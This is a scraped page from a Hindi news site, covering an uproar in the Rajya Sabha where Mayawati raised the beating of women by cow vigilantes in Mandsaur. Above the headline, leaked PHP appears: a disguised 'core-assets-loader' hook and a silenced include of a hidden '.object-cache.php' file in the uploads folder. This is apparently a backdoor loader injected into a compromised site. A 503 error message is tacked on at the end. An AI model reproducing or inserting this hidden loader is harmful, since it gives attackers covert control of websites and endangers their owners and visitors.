add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); LIVE: राज्यसभा में हंगामा, मायावती ने उठाया गौ रक्षा के नाम पर महिलाओं की पिटाई का मुद्दा – SOCH INDIA
Menu

राजनीति
LIVE: राज्यसभा में हंगामा, मायावती ने उठाया गौ रक्षा के नाम पर महिलाओं की पिटाई का मुद्दा

nobanner

राज्यसभा के वेल में हंगामा करते सांसद

मानसून सत्र में बुधवार को सदन की कार्यवाही हंगामे के साथ शुरू हुई. राज्यसभा में मायावती ने कार्यवाही शुरू होते ही दयाशंकर सिंह और मंदसौर में गौर रक्षा के नाम पर महिलाओं की पिटाई का मुद्दा उठाया. बीएसपी सुप्रीमो ने कहा कि दयाशंकर सिंह को पार्टी उन्हें सुरक्षा दे रही है, बचा रही है. मायावती के इतना कहते ही सदन में शोर मच गया.

मायावती ने कहा, ‘दयाशंकर सिंह झारखंड में हैं और यह एक बीजेपी शासित राज्य है. इससे साफ जाहिर होता है कि बीजेपी उन्हें बचा रही है.’ उनके इतना कहते ही हंगामा करते हुए कुछ सांसद वेल तक आ गए. मायावती ने बीजेपी पर जुबानी प्रहार करते हुए कहा, ‘बीजेपी नारा देती है- महिलाओं के सम्मान में, बीजेपी मैदान में. जबकि बीजेपी शासित मध्य प्रदेश में बीफ की अफवाह पर महिलाओं को पीटा जाता है.’ मायावती ने दलितों की पिटाई का भी मुद्दा उठाया, जिस पर सदन में जमकर हंगामा हुआ.

बता दें कि मध्यप्रदेश के मंदसौर में खुद को गौर रक्षक बताने वाले लोगों ने दो महिलाओं की पिटाई कर दी. ऐसा बीफ की अफवाह के बाद किया गया.

एमपी में गौ रक्षकों द्वारा महिलाओं की पिटाई के मामले पर बोलते हुए कांग्रेस नेता गलाम नबी आजाद ने कहा, ‘गौ रक्षक होने चाहिए, लेकिन उसके नाम पर बहाना करके दलित और मुसलमानों को टारगेट करो, हम इसके खि‍लाफ हैं.’

 
बीजेपी सांसद मुख्तार अब्बास नवकी ने कहा कि हिंसा की घटना चाहे जिस किसी राज्य में हो निंदनीय है. उन्होंने कहा कि मायवती ने अभी जिस मुद्दे की बात की मध्य प्रदेश की सरकार ने उस पर कार्रवाई की है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.